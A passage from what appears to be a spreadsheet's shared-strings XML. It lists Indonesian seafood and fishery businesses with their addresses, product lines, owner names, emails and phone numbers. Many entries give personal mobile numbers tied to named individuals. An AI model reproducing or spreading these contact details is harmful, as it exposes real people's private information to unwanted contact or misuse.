    <t>Produk Perikanan Bernilai Tambah Beku, Krispy Ikan, Krispy Kulit Ikan, Krispy Rumput, Abon Ikan, Kerupuk Ikan, Kerupuk Udang, Kerupuk Rumput Laut</t>
  </si>
  <si>
    <t>SUPRIYANTI</t>
  </si>
  <si>
    <t>Tanjungsari</t>
  </si>
  <si>
    <t>Banjarejo</t>
  </si>
  <si>
    <t>endangpurwaningsih113@gmail.com</t>
  </si>
  <si>
    <t>Endang 083154668041</t>
  </si>
  <si>
    <t>UD. ANDRE SEAFOOD</t>
  </si>
  <si>
    <t>Nusa Tenggara Barat</t>
  </si>
  <si>
    <t>Jl. DR Soedjono Lingkar Selatan RT 003, Lingkungan Mapak Indah, Kel. Jempong Baru, Kec. Sekarbela, Kota Mataram</t>
  </si>
  <si>
    <t>Kerang Segar, Ikan Demersal Segar</t>
  </si>
  <si>
    <t>H. ANDRI BUDIONO, A.Md</t>
  </si>
  <si>
    <t>Sekarbela</t>
  </si>
  <si>
    <t>Jempong Baru</t>
  </si>
  <si>
    <t>budiono_andri@yahoo.co.id</t>
  </si>
  <si>
    <t>H.ANDRI BUDIONO, A.Md, 081331143969</t>
  </si>
  <si>
    <t>PT. BINTANG JAYAKOTA MANDIRI</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Raya IV No.16, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Pelagis Beku, Hiu Beku, Tuna Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>HENDRIK KOSASIH</t>
  </si>
  <si>
    <t>bintangbjm@yahoo.co.id</t>
  </si>
  <si>
    <t>AHMAD SURYANA 081381791249</t>
  </si>
  <si>
    <t>AHMAD SURYANA</t>
  </si>
  <si>
    <t>PT. HENTRY JAYA</t>
  </si>
  <si>
    <t>VANLEY</t>
  </si>
  <si>
    <t>hentryjayaqc@gmail.com</t>
  </si>
  <si>
    <t>(0361) 721386</t>
  </si>
  <si>
    <t>081338550535, Antony Yusuf 081338131420</t>
  </si>
  <si>
    <t>CV. BEE JAY SEAFOODS</t>
  </si>
  <si>
    <t>Jl. Tanjung Tembaga Barat Pelabuhan Mayangan, Kel. Mayangan, Kec. Mayangan, Kota Probolinggo</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Udang Kipas Beku, Ikan Pelagis Beku, Ikan Demesal Beku</t>
  </si>
  <si>
    <t>Benjamin Mangitung</t>
  </si>
  <si>
    <t>sumariono@beejayseafoods.com</t>
  </si>
  <si>
    <t>0335-4493799</t>
  </si>
  <si>
    <t>082111598002, Sumariono 085259824992</t>
  </si>
  <si>
    <t>Juda Mangitung</t>
  </si>
  <si>
    <t>PT. BATULICIN ALGAE PERSADA</t>
  </si>
  <si>
    <t>Jl. Raya Serongga, Kel. Gunung Besar, Kec. Simpang empat, Kabupaten Tanah Bumbu</t>
  </si>
  <si>
    <t>Alkali Treated Seaweed Chips</t>
  </si>
  <si>
    <t>I Gusti Ayu Nyoman Sitawati</t>
  </si>
  <si>
    <t>Simpang empat</t>
  </si>
  <si>
    <t>Gunung Besar</t>
  </si>
  <si>
    <t>ptbaper.persada@gmail.com</t>
  </si>
  <si>
    <t>081238561436, 08113855588</t>
  </si>
  <si>
    <t>PT. GRAND MULTI CHEMICAL</t>
  </si>
  <si>
    <t>Kawasan Industri dan Pergudangan Cikupamas Jl. Bhumimas VIIII No.7, Kel. Talaga, Kec. Cikupa, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Tepung Rumput Laut, Nori</t>
  </si>
  <si>
    <t xml:space="preserve">BERNARD SUDIRMAN </t>
  </si>
  <si>
    <t>Talaga</t>
  </si>
  <si>
    <t>import.ptgmc@gmail.com</t>
  </si>
  <si>
    <t>021-5224502</t>
  </si>
  <si>
    <t>SURYA (0812-8799-5788)</t>
  </si>
  <si>
    <t>UD. SISCA</t>
  </si>
  <si>
    <t>Jl. Tukad Yeh Aya No.38, Kel. Panjer, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Lobster Hidup, Kerapu Hidup</t>
  </si>
  <si>
    <t>Martha Tresia</t>
  </si>
  <si>
    <t>Panjer</t>
  </si>
  <si>
    <t>marthatresia@hotmail.com</t>
  </si>
  <si>
    <t>0361-234296</t>
  </si>
  <si>
    <t>Martha Tresia 08113865663</t>
  </si>
  <si>
    <t>PT. SUMBER MINA SAMUDERA</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna IV No. 5 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Cephalopoda Beku, Tuna Beku</t>
  </si>
  <si>
    <t>TARNO</t>
  </si>
  <si>
    <t>damayanti.sms@gmail.com</t>
  </si>
  <si>
    <t>0361-726433</t>
  </si>
  <si>
    <t>SRI NUR AINI / 082399040714</t>
  </si>
  <si>
    <t>SRI NUR AINI</t>
  </si>
  <si>
    <t>PT. WEST IRIAN FISHING INDUSTRIES</t>
  </si>
  <si>
    <t>Jl. Udang No.6 Klademak I, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Tuna Beku</t>
  </si>
  <si>
    <t>IBNU SYENA ALFITRA</t>
  </si>
  <si>
    <t>endangroesbandi@gmail.com</t>
  </si>
  <si>
    <t>0951-321317</t>
  </si>
  <si>
    <t>RISNA D. ASTUTY 082239444400 NURCHAYATI 0818725435</t>
  </si>
  <si>
    <t>ENDANG S. ROESBANDI</t>
  </si>
  <si>
    <t>PT. DUA PUTRA PERKASA PRATAMA</t>
  </si>
  <si>
    <t>Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 1), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Pelagis Segar, Ikan Demersal Beku, Ikan Demersal Segar, Cephalopoda Beku, Cephalopoda Segar, Tuna Beku, Tuna Segar, Udang Beku, Udang Segar, Salmon Beku, Salmon Segar</t>
  </si>
  <si>
    <t>Raharditya Bagus Perkasa</t>
  </si>
  <si>
    <t>Pondok Melati</t>
  </si>
  <si>
    <t>Jati Rahayu</t>
  </si>
  <si>
    <t>ptdpp12@gmail.com</t>
  </si>
  <si>
    <t>021-84974442</t>
  </si>
  <si>
    <t>Yunus 08128563115</t>
  </si>
  <si>
    <t>Yunus</t>
  </si>
  <si>
    <t>UD. TOKO WALET NUSANTARA</t>
  </si>
  <si>
    <t>Jl. Diponegoro No.150 Blok A21, Kel. Dauh Puri Kelod, Kec. Denpasar Barat, Kota Denpasar</t>
  </si>
  <si>
    <t>Perut Ikan Kering, Teripang Kering, Abalone Kering, Scallop Kering</t>
  </si>
  <si>
    <t>Ricky Hardy</t>
  </si>
  <si>
    <t>Denpasar Barat</t>
  </si>
  <si>
    <t>Dauh Puri Kelod</t>
  </si>
  <si>
    <t>toko_waletnusantara@hotmail.com</t>
  </si>
  <si>
    <t>0361-235988</t>
  </si>
  <si>
    <t>Aini 08123953814</t>
  </si>
  <si>
    <t>PT. LAURA INDO</t>
  </si>
  <si>
    <t>Sumatera Selatan</t>
  </si>
  <si>
    <t>Jl. Sabar Jaya No.59, Kel. Perajen, Kec. Banyuasin I, Kabupaten Banyuasin</t>
  </si>
  <si>
    <t>Udang Mentah Beku, Udang Rebus Beku, Rajungan Beku, Ikan Hasil Budidaya Beku, Ikan Pelagis Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>PT. CAHAYA BINTANG INDOSEJAHTERA DAN SIM USMAN</t>
  </si>
  <si>
    <t>Banyuasin</t>
  </si>
  <si>
    <t>Prajen</t>
  </si>
  <si>
    <t>marketing@lauraindo.com</t>
  </si>
  <si>
    <t>0711-7537111, 0711-7537058</t>
  </si>
  <si>
    <t>Myrna, S.TP HP 08127812566</t>
  </si>
  <si>
    <t>SIM USMAN</t>
  </si>
  <si>
    <t>PT. KIRANA FOOD INTERNATIONAL</t>
  </si>
  <si>
    <t>Jl. Raya Pakah Ponco, Kel. Sumberagung, Kec. Plumpang, Kabupaten Tuban</t>
  </si>
  <si>
    <t>Wakame Beku, Seafood Bernilai Tambah Beku, Telur Ikan Terbang Kering, Udang Mentah Beku, Udang Kipas Beku</t>
  </si>
  <si>
    <t>Muhammad Novi Saputro</t>
  </si>
  <si>
    <t>Plumpang</t>
  </si>
  <si>
    <t xml:space="preserve">Sumberagung </t>
  </si>
  <si>
    <t>kirana@kmlseafood.com</t>
  </si>
  <si>
    <t>0313976351, 035-68812888, 035-68812999</t>
  </si>
  <si>
    <t>Rahmatul Laili (082233200327), Ziyadatul Ilmiyah (085234017028)</t>
  </si>
  <si>
    <t>PT. SUKANDA DJAYA</t>
  </si>
  <si>
    <t>Kawasan Industri MM2100 Jalan Irian Blok FF No. 2, Kel. Danau Indah, Kec. Cikarang Barat, Kabupaten Bekasi</t>
  </si>
  <si>
    <t>Beku, Asap, Segar</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Asap Beku, Ikan Demersal Beku, Salmon Segar, Trout Segar, Salmon Beku, Trout Beku, Scallop Beku</t>
  </si>
  <si>
    <t>Chen Tsen Nan</t>
  </si>
  <si>
    <t>Cikarang Barat</t>
  </si>
  <si>
    <t>Danau Indah</t>
  </si>
  <si>
    <t>gov.regulation@diamond.co.id</t>
  </si>
  <si>
    <t>021-6405678</t>
  </si>
  <si>
    <t>Alvian Riyanto / 021-6405678</t>
  </si>
  <si>
    <t>Alvian Riyanto</t>
  </si>
  <si>
    <t>PT. HAE DONG JAYA ABADI</t>
  </si>
  <si>
    <t>Margomulyo Permai Blok H5, Kel. Tambak Sarioso, Kec. Asemrowo, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Scombroid Beku, Ikan Hasil Budidaya Beku, Tuna Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>Choi Jae Uk</t>
  </si>
  <si>
    <t>Tambak Sarioso</t>
  </si>
  <si>
    <t>pthaedong_ja@yahoo.com</t>
  </si>
  <si>
    <t>031-99000916</t>
  </si>
  <si>
    <t>SYAFRIANIDA ANWAR 08563381766</t>
  </si>
  <si>
    <t>PT. DKSH INDONESIA</t>
  </si>
  <si>
    <t>PT LF Service Indonesia, Jl. Jawa Kav A1-1 Kawasan Industri MM2100, Kel. Mekarwangi, Kec. Cikarang Barat, Kabupaten Bekasi</t>
  </si>
  <si>
    <t>MInyak Ikan Omega 3, Minyak Salmon, Tepung Agar-agar, Tepung Karagenan, Tepung Alginat, Flakes Rumput Laut, Tepung Rumput Laut</t>
  </si>
  <si>
    <t>Tay Lim Pin</t>
  </si>
  <si>
    <t>Mekarwangi</t>
  </si>
  <si>
    <t>regIDN@dksh.com</t>
  </si>
  <si>
    <t>021-29888557</t>
  </si>
  <si>
    <t>Arina 081294047916</t>
  </si>
  <si>
    <t>Arina Kusumawati</t>
  </si>
  <si>
    <t>PT. VESSEL FRESHFISH INDOMAKMUR</t>
  </si>
  <si>
    <t>Kawasan Industri Jatake, Jl. Industri Raya II Blok J No.5 , Kel. Pasir Jaya, Kec. Jatiuwung, Kota Tangerang</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Udang Beku, Cephalopoda Beku, Tuna Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>Sofjan Rudijanto</t>
  </si>
  <si>
    <t>Jatiuwung</t>
  </si>
  <si>
    <t>Pasir Jaya</t>
  </si>
  <si>
    <t>pdsbanten@gmail.com</t>
  </si>
  <si>
    <t>Chasyimun ( 08129700</t>
  </si>
  <si>
    <t>Andriansyah Gunawan</t>
  </si>
  <si>
    <t>PT. DYTONA DELI KRISP</t>
  </si>
  <si>
    <t>Jl. Mutiara III, Kel. Curug, Kec. Gunung Sindur, Kabupaten Bogor</t>
  </si>
  <si>
    <t>Kering, -</t>
  </si>
  <si>
    <t>Kerupuk Ikan, Kerupuk Udang, Ikan Asin Goreng</t>
  </si>
  <si>
    <t>Ariston Johannes Budiarto</t>
  </si>
  <si>
    <t>Gunung Sindur</t>
  </si>
  <si>
    <t>Curug</t>
  </si>
  <si>
    <t>dytonadelikrisp@yahoo.co.id</t>
  </si>
  <si>
    <t>Geraldo Widjaja / 081283275271</t>
  </si>
  <si>
    <t>Geraldo Widjaja</t>
  </si>
  <si>
    <t>PT. GLOBAL MAJU PRATAMA</t>
  </si>
  <si>
    <t>Pattene Business Park Blok H No.2, Kel. Pabentengan, Kec. Marusu, Kabupaten Maros</t>
  </si>
  <si>
    <t>Keong Beku, Cephalopoda Beku, Ikan Demersal Beku, Ikan Demersal Segar, Ikan Pelagis Beku, Ikan Pelagis Segar, Tuna Beku, Tuna Segar</t>
  </si>
  <si>
    <t>TAN LUNARDI</t>
  </si>
  <si>
    <t>Pabentengan</t>
  </si>
  <si>
    <t>wulan.fish@gmail.com</t>
  </si>
  <si>
    <t>H. ANDI BASO MAPPAEWA  0811442028</t>
  </si>
  <si>
    <t>H. ANDI BASO MAPPAEWA</t>
  </si>
  <si>
    <t>PT. SUSHI - TEI INDONESIA</t>
  </si>
  <si>
    <t>Kompleks Pergudangan Tunas Bitung Blok C-3 No.09-11, Kel. Pasir Jaya, Kec. Cikupa, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Salmon Segar, Trout Segar</t>
  </si>
  <si>
    <t>naboru takekura</t>
  </si>
  <si>
    <t>jim.wibowo@gmail.com</t>
  </si>
  <si>
    <t>Jimmi (0818136363)</t>
  </si>
  <si>
    <t>sonny kurniawan</t>
  </si>
  <si>
    <t>PT. TOBA SURIMI INDUSTRIES PLANT I</t>
  </si>
  <si>
    <t>Jl. Pulau Sumatera KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan</t>
  </si>
  <si>
    <t>Beku, -</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Lobster Air Tawar Beku, Daging Rajungan Rebus Beku, Tuna Masak Beku, Udang Rebus Beku, Udang Mentah Beku, Kepiting Beku, Campuran Seafood Beku</t>
  </si>
  <si>
    <t>GINDRA TARDY</t>
  </si>
  <si>
    <t>exim@tobaseafood.com</t>
  </si>
  <si>
    <t>Simon Lahengko &amp; 081398090892</t>
  </si>
  <si>
    <t>IRSAN SUDARGO</t>
  </si>
  <si>
    <t>PT. NUANSA ALAM ABADI</t>
  </si>
  <si>
    <t>Jl. Pasir Putih Raya Kav 1, Ancol Timur RT 003 RW 010, Kel. Ancol, Kec. Pademangan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Scallop Segar, Fillet Kod Beku, Ikan Demersal Segar, Salmon Segar, Trout Segar</t>
  </si>
  <si>
    <t>bintang.nurcahyo@diamond.co.id</t>
  </si>
  <si>
    <t>Bintang Nurcahyo, (021) 6405678, Ezra 081931733688</t>
  </si>
  <si>
    <t>Bintang Nurcahyo</t>
  </si>
  <si>
    <t>CV. BUANA LAUT NUSANTARA</t>
  </si>
  <si>
    <t>Jl. Kima VI Kav F1/B1, Kel. Daya, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Cephalopoda Segar, Ikan Demersal Beku, Ikan Demersal Segar, Ikan Pelagis Beku, Ikan Pelagis Segar, Udang Kipas Beku, Udang Kipas Segar, Gurita Rebus Beku</t>
  </si>
  <si>
    <t>ALEX FAISOL T WARTONO</t>
  </si>
  <si>
    <t>darmawati.mjd@gmail.com</t>
  </si>
  <si>
    <t>0411-518328</t>
  </si>
  <si>
    <t>RIYAN FIRDAUS, 085398338925</t>
  </si>
  <si>
    <t>ANWAR KARIM</t>
  </si>
  <si>
    <t>CV. MUARA LAUT</t>
  </si>
  <si>
    <t>Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur , Kec. Kosambi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Ikan Kering, Telur Ikan Terbang Kering, Udang Kering, Cephalopoda Kering, Kerang Hidup, Lobster Hidup, Keong Hidup, Kepiting Hidup, Udang Ronggeng Hidup, Sidat Hidup, Ikan Air Tawar Hidup, Udang Hidup, Daging Kerang Beku, Ikan Pelagis Segar, Udang Segar, Ikan Demersal Segar, Telur Ikan Segar, Sirip Pari Kering, Kulit Pari Kering, Tulang Pari Kering , Hiu Segar, Pari Segar, Abalone Kering, Tuna Segar, Perut Ikan Segar, Lobster Air Tawar Segar, Teripang Segar, Scallop Segar, Teripang Kering, Cacing Laut Kering, Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering, Perut Ikan Kering</t>
  </si>
  <si>
    <t>ALWI ANGGA BUDIMAN</t>
  </si>
  <si>
    <t xml:space="preserve">Kosambi Timur </t>
  </si>
  <si>
    <t>muara_laut@yahoo.com</t>
  </si>
  <si>
    <t>Ryan, 081314433488</t>
  </si>
  <si>
    <t xml:space="preserve">ALWI ANGGA BUDIMAN </t>
  </si>
  <si>
    <t>UD. ANTAMAIQ</t>
  </si>
  <si>
    <t>Jl. Arwana 1 BTN Taman Mutiara, Kel. Pagutan Barat, Kec. Mataram, Kota Mataram</t>
  </si>
  <si>
    <t>Sari Ikan Gabus Beku, Abon Ikan Gabus</t>
  </si>
  <si>
    <t>H.ISMAIL</t>
  </si>
  <si>
    <t>Mataram</t>
  </si>
  <si>
    <t>Pagutan Barat</t>
  </si>
  <si>
    <t>zzigitzagat@gmail.com</t>
  </si>
  <si>
    <t>H.ISMAIL ,08123710043</t>
  </si>
  <si>
    <t>CV. INDO JAYA PRATAMA</t>
  </si>
  <si>
    <t>Dusun Krajan RT 005 RW 004, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>Kaleng, Kering</t>
  </si>
  <si>
    <t>Sarden Kaleng, Rumput Laut Kering</t>
  </si>
  <si>
    <t>Heru Santoso</t>
  </si>
  <si>
    <t>cv.indojayapratama_2@yahoo.com</t>
  </si>
  <si>
    <t>0333-595711</t>
  </si>
  <si>
    <t>Atika Fitriani 081331357869</t>
  </si>
  <si>
    <t>CV. CINDY GROUP INDONESIA</t>
  </si>
  <si>
    <t>Gedung Olahan Sentra Minapolitan, Jl. H. Usa No.12A, Kel. Ciseeng, Kec. Ciseeng, Kabupaten Bogor</t>
  </si>
  <si>
    <t>Lainnya, Pindang</t>
  </si>
  <si>
    <t>Bandeng Presto, Pindang Tongkol Suir, Ikan Pindang</t>
  </si>
  <si>
    <t>SHOLIHIN</t>
  </si>
  <si>
    <t>Ciseeng</t>
  </si>
  <si>
    <t>cindygroupindonesiautama@gmail.com</t>
  </si>
  <si>
    <t>PT. BUDI SENTOSA ABADI</t>
  </si>
  <si>
    <t>Jl. Samuel Languyu No.10, Kel. Aertembaga I Lingkungan II, Kec. Aertembaga, Kota Bitung</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Pelagis Segar</t>
  </si>
  <si>
    <t>Budi Sentosa Abadi</t>
  </si>
  <si>
    <t>Aertembaga</t>
  </si>
  <si>
    <t>Aertembaga I Lingkungan II</t>
  </si>
  <si>
    <t>pt_budisentosaabadi@yahoo.co.id</t>
  </si>
  <si>
    <t>0438-31955</t>
  </si>
  <si>
    <t>Nirmala 08534379934</t>
  </si>
  <si>
    <t>Budijono Lie</t>
  </si>
  <si>
    <t>PT. LAUT UNITED</t>
  </si>
  <si>
    <t>Jl. Pelabuhan Perikanan Samudera Belawan No.42, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan</t>
  </si>
  <si>
    <t>Udang Beku, Kepiting Beku, Ikan Pelagis Beku, Cephalopoda Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>PT.LAUT UNITED</t>
  </si>
  <si>
    <t>dewimaya.plu@gmail.com</t>
  </si>
  <si>
    <t>082266762202, 061-6943888</t>
  </si>
  <si>
    <t>Ade 08116553174</t>
  </si>
  <si>
    <t>Zulfahri Siagian, SE</t>
  </si>
  <si>
    <t>PT. CENHONG FISHERINDO</t>
  </si>
  <si>
    <t>Pelabuhan Perikanan Samudera Nizam Zachman Jl. Muara Baru Ujung Blok L No.3 Room 4 dan 5, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Bandeng Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Tuna Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>Lim Bun Keng</t>
  </si>
  <si>
    <t>cenhong@gmail.com</t>
  </si>
  <si>
    <t>Tia 082122922803</t>
  </si>
  <si>
    <t>CV. KARUNIA INDO BAHARI</t>
  </si>
  <si>
    <t>Jl. Dumais Lingkungan II, Kel. Girian Bawah, Kec. Girian, Kota Bitung</t>
  </si>
  <si>
    <t>DANNY WIDJAJA</t>
  </si>
  <si>
    <t>cv.karuniaindobahari@gmail.com</t>
  </si>
  <si>
    <t>0438-2230787</t>
  </si>
  <si>
    <t>Denny Widjaya 081399789888, 082348419646</t>
  </si>
  <si>
    <t>KOPERASI PANIPAHAN SEJAHTERA</t>
  </si>
  <si>
    <t>Riau</t>
  </si>
  <si>
    <t>Jl. Bakti No.976, Kel. Panipahan Darat, Kec. Pasir Limau Kapas, Kabupaten Rokan Hilir</t>
  </si>
  <si>
    <t>Segar, Lainnya, Kering</t>
  </si>
  <si>
    <t>Udang Segar, Kepiting Hidup, Kerang Segar, Gurita Segar, Cumi-Cumi Segar, Ikan Asin Kering, Rajungan Segar, Kerang Hidup, Udang Kering, Ikan Pelagis Segar, Ikan Demersal Segar</t>
  </si>
  <si>
    <t>asmadi sirait</t>
  </si>
  <si>
    <t>Pasir Limau Kapas</t>
  </si>
  <si>
    <t>Panipahan Darat</t>
  </si>
  <si>
    <t>panipahansejahtera@yahoo.com</t>
  </si>
  <si>
    <t>syahril 081363674445</t>
  </si>
  <si>
    <t>CV. BUMI PERTIWI</t>
  </si>
  <si>
    <t>Pergudangan Bandara Mas Blok M No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Hiu Beku, Cephalopoda Beku, Pari Segar, Tuna Segar, Tuna Beku, Labi-Labi Hidup, Kerang Beku, Perut Ikan Beku, Udang Beku, Salmon Segar, Kepiting Beku, Lobster Beku, Telur Ikan Beku, Ikan Demersal Segar, Udang Segar, Ikan Pelagis Segar, Ikan Air Tawar Segar, Lobster Segar, Kepiting Segar, Ikan Demersal Beku, Ikan Air Tawar Beku</t>
  </si>
  <si>
    <t>BUDIYANTO</t>
  </si>
  <si>
    <t>cvbumipertiwi21@gmail.com</t>
  </si>
  <si>
    <t>021-55726725</t>
  </si>
  <si>
    <t>ARIEF RIDWAN NUGRAHA :081573699384 , AHMAD ALI : 082218770582</t>
  </si>
  <si>
    <t>ARIEF RIDWAN NUGRAHA</t>
  </si>
  <si>
    <t>UD. SBY CORPORATION</t>
  </si>
  <si>
    <t>Jl. Hayam Wuruk No. 1 RT 03 RW 05, Kel. Sukodadi, Kec. Sukodadi, Kabupaten Lamongan</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku, Abon Ikan</t>
  </si>
  <si>
    <t>Hj. Sumiarsih</t>
  </si>
  <si>
    <t>Sukodadi</t>
  </si>
  <si>
    <t>sbycorporation@gmail.com</t>
  </si>
  <si>
    <t>CV. DUA SAMPURNA</t>
  </si>
  <si>
    <t>Jl. Raya Kepadangan No.104 RT 003 RW 001, Kel. Kepadangan, Kec. Tulangan, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Yusuf Machmudin</t>
  </si>
  <si>
    <t>Tulangan</t>
  </si>
  <si>
    <t xml:space="preserve">Kepadangan </t>
  </si>
  <si>
    <t>ediamin73@gmail.com</t>
  </si>
  <si>
    <t>Edi Amin 081259155959</t>
  </si>
  <si>
    <t>PT. SEAFOOD SAMUDERA PACIFIC</t>
  </si>
  <si>
    <t>Jl. Gabion No.15, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Udang Beku, Scallop Beku, Keong Beku, Kepiting Beku</t>
  </si>
  <si>
    <t>Ramat Jap dan Tan York Seng</t>
  </si>
  <si>
    <t>noktawinmh@yahoo.co.id</t>
  </si>
  <si>
    <t>061-6941438</t>
  </si>
  <si>
    <t>Wandi 08126078122</t>
  </si>
  <si>
    <t>Wandi</t>
  </si>
  <si>
    <t>PT. SEAFOOD SUMATERA PERKASA</t>
  </si>
  <si>
    <t>Jl. Titi Pahlawan No.38, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Udang Rebus Beku, Lobster Air Tawar Beku, Kepiting Beku, Kerang Beku, Ikan Pelagis Beku, Kepiting Kulit Lunak Beku, Ikan Air Tawar Beku, Cephalopoda Beku, Udang Mentah Beku</t>
  </si>
  <si>
    <t>Ramat Beng Iyu dan Tan York Seng</t>
  </si>
  <si>
    <t>Medan Marelan</t>
  </si>
  <si>
    <t>Rengas Pulau</t>
  </si>
  <si>
    <t>rizkysanjayasiregar@yahoo.co.id</t>
  </si>
  <si>
    <t>061-6858888</t>
  </si>
  <si>
    <t>Noktawin Maradona Hutapea 081218004780</t>
  </si>
  <si>
    <t>PT. MUTIARA LAUT ABADI</t>
  </si>
  <si>
    <t>Jl. Pulau Buton KIM II Mabar, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang</t>
  </si>
  <si>
    <t>Daging Rajungan Pasteurisasi Kaleng, Udang Beku, Ikan Demersal Beku, Cephalopoda Beku, Kepiting Kulit Lunak Beku</t>
  </si>
  <si>
    <t>M Silitonga</t>
  </si>
  <si>
    <t>skp.mutiaralautabadi@gmail.com</t>
  </si>
  <si>
    <t>061-6871530</t>
  </si>
  <si>
    <t>Sukma Trimurti A - 085270513636, Mizwan 081282183646</t>
  </si>
  <si>
    <t>CV. SELAT MALAKA FROZEN</t>
  </si>
  <si>
    <t>Jl. Lingkar Lingkungan XI Komplek Pelabuhan Perikanan Samudera Belawan Gabion, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan</t>
  </si>
  <si>
    <t>HERDI</t>
  </si>
  <si>
    <t xml:space="preserve">Bagan Deli  </t>
  </si>
  <si>
    <t>selatmalaka_frozen238@yahoo.com</t>
  </si>
  <si>
    <t>061-6944591</t>
  </si>
  <si>
    <t>HERDI 085270238888</t>
  </si>
  <si>
    <t>PT. INDONESIA BAHARI LESTARI</t>
  </si>
  <si>
    <t>Jl. Raya Narogong KM 26.5, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor</t>
  </si>
  <si>
    <t>Surimi Beku</t>
  </si>
  <si>
    <t>Budi Satria Tardy</t>
  </si>
  <si>
    <t>qms.iblestari@gmail.com</t>
  </si>
  <si>
    <t>021-22886801</t>
  </si>
  <si>
    <t>Rismia 081379228172</t>
  </si>
  <si>
    <t>PT. DSINDO ABADI INTERNASIONAL</t>
  </si>
  <si>
    <t>Jl. Raya Perancis Pergudangan 75 Blok F No.6A, Kel. Benda, Kec. Benda, Kota Tangerang</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Bandeng Beku, Udang Kipas Beku, Udang Beku, Ikan Demersal Beku, Sotong Beku, Cumi-Cumi Beku, Scallop Beku, Keong Beku, Cunang Beku</t>
  </si>
  <si>
    <t>Willy filbert</t>
  </si>
  <si>
    <t>dsindo.abadi@gmail.com</t>
  </si>
  <si>
    <t>021-55913304</t>
  </si>
  <si>
    <t>Willy filbert (08128052203)</t>
  </si>
  <si>
    <t>PT. SINAR SURYA ALAM</t>
  </si>
  <si>
    <t>Jl. Raya Tuban Tambakboyo, Kel. Sobontoro, Kec. Tambakboyo, Kabupaten Tuban</t>
  </si>
  <si>
    <t>BAMBANG SUJANTO</t>
  </si>
  <si>
    <t>pt.sinarsuryaalam@gmail.com</t>
  </si>
  <si>
    <t>0356-4161897</t>
  </si>
  <si>
    <t>JOHANES TRI 082338878099</t>
  </si>
  <si>
    <t>Novita</t>
  </si>
  <si>
    <t>CV. PESONA MANDIRI</t>
  </si>
  <si>
    <t>Jl. Ikan Belanak No.01, Kel. Mayangan, Kec. Mayangan, Kota Probolinggo</t>
  </si>
  <si>
    <t>Daging Kerang Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Cephalopoda Beku, Ikan Asin Kering</t>
  </si>
  <si>
    <t>Tony Denisend</t>
  </si>
  <si>
    <t>cold_storage@yahoo.com</t>
  </si>
  <si>
    <t>0335-42555</t>
  </si>
  <si>
    <t>Cyntia N 081259211889</t>
  </si>
  <si>
    <t>Raymon</t>
  </si>
  <si>
    <t>PT. PERINTIS JAYA INTERNASIONAL</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Raya Barat No.6 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Hiu Segar, Hiu Beku</t>
  </si>
  <si>
    <t>YANVANIUS PRIMADY EFFENDY</t>
  </si>
  <si>
    <t>Perintisjaya.QC@gmail.com</t>
  </si>
  <si>
    <t>0361 722076</t>
  </si>
  <si>
    <t>YETI ARIYANTI &amp; 081236306991</t>
  </si>
  <si>
    <t>YETI ARIYANTI</t>
  </si>
  <si>
    <t>PT. YIN JING INTERNASIONAL</t>
  </si>
  <si>
    <t>Jl. Kima 3 Kav S-13, Kel. Daya, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>ZHOU DEGUAN</t>
  </si>
  <si>
    <t>pt.yinjing.internasional@gmail.com</t>
  </si>
  <si>
    <t>0411-4743057</t>
  </si>
  <si>
